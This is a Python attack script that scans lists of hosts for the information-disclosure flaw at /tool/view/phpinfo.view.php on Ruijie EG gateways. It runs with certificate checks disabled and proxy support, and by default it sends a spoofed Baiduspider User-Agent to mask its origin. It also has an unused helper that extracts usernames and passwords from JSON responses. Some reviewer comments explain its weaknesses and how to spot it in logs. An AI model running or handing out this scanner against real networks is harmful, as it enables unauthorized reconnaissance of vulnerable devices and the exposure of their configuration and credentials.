锐捷EG易网关PHPINFO.VIEW.PHP 信息泄露漏洞.py
import argparse
import json
from user_agent import get_user_agent_pc
import requests
import os
import random
import string
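# Certificate warnings are silenced because _get_request() sends every request
# with verify=False: TLS certificates are NOT validated, so a response is not
# proof that it came from the intended device.
requests.packages.urllib3.disable_warnings()

# Default request headers; task() adds a "User-Agent" entry at run time.
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

# Run-time settings, overwritten by task() from the parsed command-line options.
# (The original assigned ``proxies = None`` twice; the duplicate is dropped.)
proxies = None
timeout = None
delay = None
thread = None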
# 1. Request the target URL
def _get_request(url: str) -> (int, requests.Response or str):
    """Send one GET request using the module-level request settings.

    Returns ``(200, response)`` when a response was received. The 200 is this
    script's own "request completed" marker, not the HTTP status code, which
    the caller reads from ``response.status_code``. Returns ``(500, message)``
    when the request raised.
    """
    try:
        response = requests.get(
            url=url,
            timeout=timeout,
            headers=headers,
            proxies=proxies,
            verify=False,  # TLS certificate validation is disabled for every target
        )
    except Exception:
        # Best-effort: any failure is reported as a message, never raised.
        return 500, f"[!]无法正常访问{url}"
    else:
        return 200, response
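# 2. Decode the response body
def _get_content(o: requests.Response, encoding: str = "UTF-8") -> str:
    """Return the response body as text.

    The charset reported on the response (``o.encoding``) is used when it is
    set; otherwise *encoding* is used. The charset label and the body both come
    from the remote server, so neither is trusted: undecodable bytes are
    replaced instead of raising, and an unknown charset label falls back to
    *encoding*. Previously either case raised and aborted the whole run.
    """
    charset = o.encoding or encoding
    try:
        return o.content.decode(charset, errors="replace")
    except LookupError:
        # The server announced a charset name Python does not know.
        return o.content.decode(encoding, errors="replace")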
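def get_data_from_file(filename: str, mode: str) -> tuple:
    """Read a whitespace-separated list of entries from *filename*.

    Relative paths are resolved against the current working directory.

    Returns:
        ``("200", entries)`` on success, where ``entries`` is the file content
        split on whitespace. Otherwise ``(code, message)`` with code ``"404"``
        (path does not exist), ``"405"`` (path exists but is not a regular
        file) or ``"500"`` (opening or reading failed).
    """
    if not os.path.isabs(filename):
        filename = os.path.abspath(os.path.join(os.getcwd(), filename))
    # Existence is checked first: os.path.isfile() is also False for a missing
    # path, so testing it first made the "404" branch unreachable.
    if not os.path.exists(filename):
        return "404", "无法找到{}文件".format(filename)
    if not os.path.isfile(filename):
        return "405", "{}不是一个合法文件".format(filename)
    try:
        with open(filename, mode=mode) as f:
            return "200", f.read().split()
    except Exception:
        # Deliberately best-effort: the caller prints the message and moves on.
        return "500", "打开{}文件时发生意料之外的错误".format(filename)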
def get_data_brute_list(url_dict: dict) -> dict:
    """Expand each ``{"type": ..., "value": ...}`` entry into a list of values.

    Entries of type ``"file"`` are loaded through get_data_from_file(); if the
    load fails its message is printed and the entry is left out. Any other
    non-empty type wraps the value in a one-element list. Entries without a
    type are skipped. The result always has a ``'url'`` key (``None`` unless
    an entry filled it).
    """
    resolved = {'url': None}
    for name, spec in url_dict.items():
        kind = spec.get("type")
        if not kind:
            continue
        if kind != "file":
            resolved[name] = [spec.get('value', None)]
            continue
        status, payload = get_data_from_file(spec.get("value"), mode="r")
        if status == "200":
            resolved[name] = payload
        else:
            print(payload)
    return resolved
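def task(url_dict: dict):
    """Request the phpinfo view page on each target and print the ones that answer.

    *url_dict* is the structure built by parse_cmd_args(): a ``url`` entry (an
    inline value or a file of targets) and an ``options`` entry. The options
    are copied into the module-level ``proxies``, ``headers``, ``timeout``,
    ``delay`` and ``thread`` settings before any request is sent.

    A target is reported when the request completes, the body is non-empty and
    the final HTTP status is in the 2xx/3xx range.
    """
    global proxies, headers, timeout, delay, thread
    brute_list = get_data_brute_list(url_dict)
    # 'url' stays None when the target file could not be read, and 'options'
    # may be absent; both used to crash here with a TypeError.
    urls = brute_list.get('url', None) or []
    options = (brute_list.get('options', None) or [{}])[0] or {}

    proxy = options.get('proxy', None)
    if proxy:
        os.environ['http_proxy'] = proxy
        # NOTE(review): only the 'http' scheme is configured; https:// targets
        # do not appear to be routed through the proxy by this mapping.
        proxies = {
            'http': proxy
        }
    headers.setdefault("User-Agent", options.get('user_agent', None))
    timeout = options.get('time_out', None)
    # delay and thread are stored but nothing below reads them: targets are
    # requested one after another with no pause.
    delay = options.get('delay', None)
    thread = options.get('thread', None)

    attack_url = "/tool/view/phpinfo.view.php"
    for url in urls:
        base = url[:-1] if url.endswith("/") else url
        code, res = _get_request(base + attack_url)
        if code != 200:
            continue
        content = _get_content(res)
        if not content:
            continue
        # NOTE(review): status and a non-empty body are the only criteria, and
        # the body is never inspected. A login page, a redirect target or a
        # catch-all error page that answers 2xx/3xx is reported as well, so
        # treat each hit as a candidate and confirm it before reporting.
        if 200 <= res.status_code < 400:
            print(f"{base + attack_url} phpinfo 泄露存在!")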
def prcess_json_data(content: str) -> (int, dict or str):
    """Extract a username/password pair from a JSON document.

    The ``data`` field is split on single spaces and its last two tokens are
    returned as ``username`` and ``password``.

    Returns ``(200, {"username": ..., "password": ...})`` on success,
    ``(404, message)`` when ``data`` is missing or empty, ``(403, message)``
    when *content* is not valid JSON and ``(500, message)`` for any other
    failure (for example fewer than two tokens).

    Nothing in the visible part of this file calls this function.
    """
    try:
        credentials = json.loads(content).get('data', None)
        if not credentials:
            return 404, "找不到账号密码相关数据"
        fields = credentials.split(" ")
        username, password = fields[-2], fields[-1]
    except json.decoder.JSONDecodeError:
        return 403, "解析文本失败,可能是内容类型发生错误"
    except Exception:
        return 500, "解析文本失败,,解析过程中出现异常"
    return 200, {
        "username": username,
        "password": password
    }
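def set_cmd_arg() -> argparse.Namespace:
    """Parse the command line and return the resulting namespace.

    Exactly one of ``-u/--url`` and ``-f/--file`` must be given. The remaining
    options are optional and default to ``None``.
    """

    def _flag(text: str) -> bool:
        # argparse's type=bool calls bool() on the raw string, so
        # "--random-agent False" used to evaluate to True. Explicit negative
        # words now map to False; everything else keeps the old bool() result.
        if text.strip().lower() in ("false", "0", "no", "off"):
            return False
        return bool(text)

    # The previous description ('Ruijie RG-EW1200G login bypass') belonged to
    # a different script; this one checks the phpinfo view page.
    description = 'Ruijie EG gateway phpinfo.view.php information disclosure check'
    parser = argparse.ArgumentParser(description=description, add_help=True)

    targets = parser.add_mutually_exclusive_group(required=True)
    targets.add_argument('-u', '--url', type=str, help='Enter target object')
    targets.add_argument("-f", '--file', type=str, help='Input target object file')

    parser.add_argument('--random-agent', type=_flag,
                        required=False, help='Using random user agents')
    parser.add_argument('--time-out', type=int,
                        required=False, help='Set the HTTP access timeout range (setting range from 0 to 5)')
    parser.add_argument('-d', '--delay', type=int,
                        required=False, help='Set multi threaded access latency (setting range from 0 to 5)')
    parser.add_argument('-t', '--thread', type=int,
                        required=False, help='Set the number of program threads (setting range from 1 to 50)')
    parser.add_argument('--proxy', type=str,
                        required=False, help='Set up HTTP proxy')
    return parser.parse_args()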
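def parse_cmd_args(args) -> dict:
    """Convert the parsed command line into the dict consumed by task().

    The result has two entries, each shaped ``{"type": ..., "value": ...}``:
    ``url`` (type ``"str"`` for ``--url``, ``"file"`` for ``--file``) and
    ``options`` (user agent, timeout pair, delay, thread count, proxy).
    """
    parsed = {}
    if args.url:
        parsed['url'] = {'type': 'str', 'value': args.url}
    else:
        parsed['url'] = {'type': 'file', 'value': args.file}

    if args.random_agent:
        user_agent = get_user_agent_pc()
    else:
        # Note for log review: the fallback User-Agent presents itself as
        # Baiduspider, so these requests cannot be attributed by User-Agent;
        # the requested path is the stable indicator.
        user_agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

    # The timeout is a pair: a random base of 1-5 seconds and that base plus
    # the requested extra. An out-of-range --time-out counts as 0 extra;
    # omitting the option adds 1.
    extra = 1
    if args.time_out is not None:
        extra = args.time_out if 0 <= args.time_out <= 5 else 0
    base = random.randint(1, 5)

    options = {
        'user_agent': user_agent,
        'time_out': (base, base + extra),
        'delay': args.delay if args.delay is not None else 0,
        # Fixed: this entry previously stored args.delay instead of args.thread.
        'thread': args.thread if args.thread is not None else 0,
        'proxy': args.proxy,
    }
    parsed['options'] = {"type": "str", "value": options}
    return parsed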
def main() -> None:
    """Entry point: parse the command line, normalise it and run the check."""
    cli_args = set_cmd_arg()
    task(parse_cmd_args(cli_args))


if __name__ == '__main__':
    main()